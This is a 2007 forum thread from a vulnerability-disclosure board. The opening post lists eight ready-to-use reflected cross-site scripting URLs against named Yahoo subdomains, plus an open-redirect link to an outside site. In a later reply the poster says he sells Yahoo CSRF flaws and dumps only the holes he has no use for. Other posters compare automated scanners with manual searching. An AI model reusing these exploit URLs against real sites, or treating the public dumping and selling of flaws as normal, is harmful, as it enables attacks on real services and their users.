Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Yahoo.net - Is this possible?
Posted by: nemessis
Date: November 29, 2007 03:29PM

1 hour on Yahoo.net subdomains searching for XSSes. I bet that if someone searches 2-3 hours every day, this list will be huge in just 2 weeks. This isn't good at all for Yahoo Inc.'s image.


http://lib.store.yahoo.net/lib/danskinonline/fit-zoom.html?img="><script>alert(/Nemessis/)</script>%7Cname=Danskin

http://cruises.travel.yahoo.net/CS/ShipExplorer/PublicAreasImg.aspx?URL="><script>alert(/Nemessis/)</script>&Dsc=Kiosk

http://education.yahoo.net/degrees/searchresults.jsp?pc="><script>alert(/Nemessis/)</script>&sub=all&qual=all&ct=either

http://es.topformacion.yahoo.net/ficha_curso.php?curso_id=24511&master="><script>alert(/Nemessis/)</script>

http://es.topformacion.yahoo.net/buscador.php?libre=%22%3E%3Cscript%3Ealert%28%2FNemessis%2F%29%3C%2Fscript%3E&categoria_id=&tipo=

http://es.topformacion.yahoo.net/ficha_centro2.php?centro_id="><script>alert(/Nemessis/)</script>

http://de.motorrad.cars.yahoo.net/nuovo/Moto/marca.php3?modello="><script>alert(/Nemessis/)</script>&marca=Piaggio

http://shopping.yahoo.es/b2b/sitesearch/merchantRedirect.jsp?partner=yahoo&link=http%3A%2F%2Ftracker.tradedoubler.com%2Fclick%3Fp%3D58193%26a%3D393940%26url=http://rstzone.org

Re: Yahoo.net - Is this possible?
Posted by: Fugitif
Date: December 06, 2007 03:33PM

2-3 hours? Maybe if you search manually... but if you use a good scanner you can find them immediately :)

(Why do you make them public when you can get money for them?)

Re: Yahoo.net - Is this possible?
Posted by: nemessis
Date: December 06, 2007 11:30PM

I don't like scanners. It's very relaxing for me when I search for XSSes.

(Because I have more than I can use in a lifetime on yahoo.com, and these are too played out. I only post what is of no use to me. Take a look at RST and you'll see that Yahoo is a staple topic for us, and their XSSes no longer mean much to our users. I only sell CSRFs in Yahoo, but they are already getting harder and harder to find.)

Re: Yahoo.net - Is this possible?
Posted by: rsnake
Date: December 10, 2007 05:40PM

@Fugitif - there is no way you would find all those in 2-3 hours, unless all you did was search those few pages. Scanners could take weeks or months poring over all the pages on Yahoo and only find a handful of issues. It totally depends on what they are searching for, how they are spidering and what they spend time looking for.

As a for instance, I scanned a client's website for 12 hours with a commercial scanner a while back. In another window, for about 3 hours I searched for holes. In the time it took to find 10 holes (12 hours), I found 48, and ate food, and watched a movie - the benefits of working from home on the weekends.

Don't give scanners more credit than they are due. They are great at monotonous tasks, but they aren't a panacea.

- RSnake
Gotta love it. http://ha.ckers.org
